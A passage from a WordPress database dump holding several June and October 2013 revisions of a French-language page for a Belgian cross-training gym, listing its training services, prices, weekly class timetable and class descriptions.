'11-revision-v1', '', '', '2013-06-16 14:14:58', '2013-06-16 14:14:58', '', 11, 'http://www.crosstrainingcenter.be/?p=107', 0, 'revision', '', 0),
(108, 1, '2013-06-16 14:16:00', '2013-06-16 14:16:00', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:00', '2013-06-16 14:16:00', '', 11, 'http://www.crosstrainingcenter.be/?p=108', 0, 'revision', '', 0),
(109, 1, '2013-06-16 14:16:31', '2013-06-16 14:16:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:16:31', '2013-06-16 14:16:31', '', 11, 'http://www.crosstrainingcenter.be/?p=109', 0, 'revision', '', 0),
(111, 1, '2013-06-16 14:17:45', '2013-06-16 14:17:45', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:45', '2013-06-16 14:17:45', '', 11, 'http://www.crosstrainingcenter.be/?p=111', 0, 'revision', '', 0),
(110, 1, '2013-06-16 14:17:07', '2013-06-16 14:17:07', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 séance : 9.00€<br>\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)<br>\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)<br>\r\nAbonnement 1 mois illimité : 69.00€\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€<br>\r\nSuivi 15,00€\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:17:07', '2013-06-16 14:17:07', '', 11, 'http://www.crosstrainingcenter.be/?p=110', 0, 'revision', '', 0),
(381, 1, '2013-10-09 21:58:57', '2013-10-09 21:58:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-09 21:58:57', '2013-10-09 21:58:57', '', 11, 'http://www2.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(112, 1, '2013-06-16 14:18:18', '2013-06-16 14:18:18', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:18', '2013-06-16 14:18:18', '', 11, 'http://www.crosstrainingcenter.be/?p=112', 0, 'revision', '', 0),
(113, 1, '2013-06-16 14:18:50', '2013-06-16 14:18:50', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:18:50', '2013-06-16 14:18:50', '', 11, 'http://www.crosstrainingcenter.be/?p=113', 0, 'revision', '', 0),
(114, 1, '2013-06-16 14:20:17', '2013-06-16 14:20:17', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color:#999999;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:20:17', '2013-06-16 14:20:17', '', 11, 'http://www.crosstrainingcenter.be/?p=114', 0, 'revision', '', 0),
